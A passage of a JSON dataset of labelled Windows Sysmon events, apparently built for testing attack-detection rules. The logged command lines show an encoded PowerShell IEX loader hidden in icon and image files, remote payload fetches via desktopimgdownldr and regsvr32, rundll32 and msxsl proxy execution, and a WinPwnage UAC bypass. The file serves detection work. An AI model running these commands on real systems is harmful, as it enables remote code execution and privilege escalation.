13:38:00.523"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16395,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:38:00.523670Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Code Execution via Pcwutl.dll","Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" pcwutl.dll,LaunchApplication c:\\Windows\\system32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-516B-5CD8-0000-001087E41600","ParentProcessId":3788,"ProcessGuid":"365ABB72-532E-5CD8-0000-00106C222700","ProcessId":1528,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:09:02.275"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16507,"Execution_attributes":{"ProcessID":2012,"ThreadID":300},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T17:09:02.275164Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["FromBase64String Command Line","Encoded FromBase64String","Suspicious Script Execution From Temp Folder","Encoded IEX"],"event":{"Event":{"EventData":{"CommandLine":"\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))\"\"\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-F639-5D53-0000-001092EE2600","ParentProcessId":6000,"ProcessGuid":"747F3D96-F639-5D53-0000-0010B0FC2600","ProcessId":8180,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 11:53:29.768"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10662,"Execution_attributes":{"ProcessID":2004,"ThreadID":4480},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-14T11:53:30.022856Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Desktopimgdownldr Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1CE4-5EFE-0000-0020CC9C0800","LogonId":"0x89ccc","OriginalFileName":"Cmd.Exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-EF3D-5EFE-0000-0010F3653401","ParentProcessId":5384,"ProcessGuid":"747F3D96-F098-5EFE-0000-001012E13801","ProcessId":1932,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-03 08:47:20.001"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":305352,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-03T08:47:20.037922Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Desktopimgdownldr Command"],"event":{"Event":{"EventData":{"CommandLine":"desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"desktopimgdownldr.exe","FileVersion":"10.0.17763.1075 (WinBuild.160101.0800)","Hashes":"SHA1=BCDDCFFCA3754875261EF1427EC4F5F4BFB8C2CE,MD5=A6DAD18B0AA125535C7FB9BBFDA25266,SHA256=0A6A2690C68CF685D8FCC9F3EA78C35BBF6F296B7B33C956B39400DF749DBC78,IMPHASH=F8D617766CF1026390A712DFC1AE2EDA","Image":"C:\\Windows\\System32\\desktopimgdownldr.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1CE4-5EFE-0000-0020CC9C0800","LogonId":"0x89ccc","OriginalFileName":"desktopimgdownldr.exe","ParentCommandLine":"cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-F098-5EFE-0000-001012E13801","ParentProcessId":1932,"ProcessGuid":"747F3D96-F098-5EFE-0000-001090E33801","ProcessId":4604,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-03 08:47:20.055"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":305354,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-03T08:47:20.073262Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Desktopimgdownldr Target File","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-07-03 08:47:21.485","Image":"C:\\Windows\\System32\\svchost.exe","ProcessGuid":"747F3D96-2178-5EFE-0000-0010AADA5800","ProcessId":1556,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Personalization\\LockScreenImage\\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z","UtcTime":"2020-07-03 08:47:21.485"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":305356,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-07-03T08:47:21.491108Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Always Install Elevated MSI Spawned Cmd And Powershell"],"event":{"Event":{"EventData":{"CommandLine":"cmd","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-C494-5CC8-0000-0020E4FF0000","LogonId":"0xffe4","ParentCommandLine":"\"C:\\Windows\\Installer\\MSI4FFD.tmp\"","ParentImage":"C:\\Windows\\Installer\\MSI4FFD.tmp","ParentProcessGuid":"365ABB72-D0E4-5CC8-0000-00103CB73E00","ParentProcessId":3680,"ProcessGuid":"365ABB72-D0E5-5CC8-0000-0010DADF3E00","ProcessId":2892,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 22:49:09.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":10153,"Execution_attributes":{"ProcessID":1936,"ThreadID":1644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T22:49:10.198351Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-C494-5CC8-0000-0020E4FF0000","LogonId":"0xffe4","ParentCommandLine":"cmd","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D0E5-5CC8-0000-0010DADF3E00","ParentProcessId":2892,"ProcessGuid":"365ABB72-D1AB-5CC8-0000-0010DB1E4400","ProcessId":1372,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 22:52:27.588"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":10154,"Execution_attributes":{"ProcessID":1936,"ThreadID":1644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T22:52:27.588976Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-433D-5CE0-0000-002031350100","LogonId":"0x13531","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-433C-5CE0-0000-00100FD20000","ParentProcessId":964,"ProcessGuid":"365ABB72-4612-5CE0-0000-00103D1E2600","ProcessId":2600,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-18 17:51:14.254"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":18851,"Execution_attributes":{"ProcessID":2044,"ThreadID":1636},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-18T17:51:14.254967Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" advpack.dll,RegisterOCX c:\\Windows\\System32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2B1B-5CD8-0000-0010CCC92500","ParentProcessId":3320,"ProcessGuid":"365ABB72-2B21-5CD8-0000-001039DD2500","ProcessId":816,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 14:18:09.573"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16452,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T14:18:09.589507Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-12 13:56:12.329","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-25EC-5CD8-0000-0010CB0A1000","ProcessId":684,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\shdocvw.url","UtcTime":"2019-05-12 13:56:12.329"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16437,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:56:12.329626Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" shdocvw.dll,OpenURL c:\\users\\ieuser\\appdata\\local\\temp\\shdocvw.url","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"python winpwnage.py -u execute -i 12 -p c:\\Windows\\System32\\calc.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-25EC-5CD8-0000-0010CB0A1000","ParentProcessId":684,"ProcessGuid":"365ABB72-25FC-5CD8-0000-0010906A1300","ProcessId":2168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:56:12.485"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16438,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:56:12.652868Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing"],"event":{"Event":{"EventData":{"CommandLine":"msxsl.exe c:\\Users\\IEUser\\AppData\\Roaming\\Adobe\\test.dat c:\\Users\\IEUser\\AppData\\Roaming\\Adobe\\test.dat","Company":"Microsoft","CurrentDirectory":"D:\\","Description":"msxsl","FileVersion":"1.1.0.1","Hashes":"SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8","Image":"\\\\vboxsrv\\HTools\\msxsl.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D2D4-5CE6-0000-001047EA6400","ParentProcessId":2236,"ProcessGuid":"365ABB72-D7B0-5CE6-0000-001077C56D00","ProcessId":3388,"Product":"Command Line XSLT","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 17:26:08.686"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1017,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:26:08.716859Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"MSXML 3.0 SP11","FileVersion":"8.110.7601.23648","Hashes":"SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648","Image":"\\\\vboxsrv\\HTools\\msxsl.exe","ImageLoaded":"C:\\Windows\\System32\\msxml3.dll","ProcessGuid":"365ABB72-D7B0-5CE6-0000-001077C56D00","ProcessId":3388,"Product":"Microsoft(R) MSXML 3.0 SP11","RuleName":"Execution - Suspicious Microsoft.XMLDOM module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-05-23 17:26:08.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":1018,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:26:08.947190Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious ftp.exe"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /C c:\\Windows\\system32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\System32\\ftp.exe\" -s:c:\\users\\ieuser\\appdata\\local\\temp\\ftp.txt","ParentImage":"C:\\Windows\\System32\\ftp.exe","ParentProcessGuid":"365ABB72-55F1-5CD8-0000-00108A153300","ParentProcessId":3668,"ProcessGuid":"365ABB72-55F1-5CD8-0000-0010781C3300","ProcessId":2392,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:20:49.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16513,"Execution_attributes":{"ProcessID":2012,"ThreadID":300},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T17:20:49.443464Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"6661D424-EC73-5EFE-0000-00109FEA6300","ProcessId":6292,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.257"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400701,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.276333Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Explorer Root Flag Process Tree Break","Proxy Execution Via Explorer.exe"],"event":{"Event":{"EventData":{"CommandLine":"explorer.exe /root,\"c:\\windows\\System32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Administrator.ECORP\\","Description":"Windows Explorer","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=59AB8548708342C77C51F70EEC5CED0A88DC4701,MD5=6A65873EA949C5CCC72DDEF9E9780AA5,SHA256=16656BBB748BA1C811BB2C68D987DC0F5CAF149E41A84E45F6B6ECAAF7D29AB2,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959","Image":"C:\\Windows\\explorer.exe","IntegrityLevel":"High","LogonGuid":"6661D424-948B-5EEF-0000-002072300F00","LogonId":"0xf3072","OriginalFileName":"EXPLORER.EXE","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" 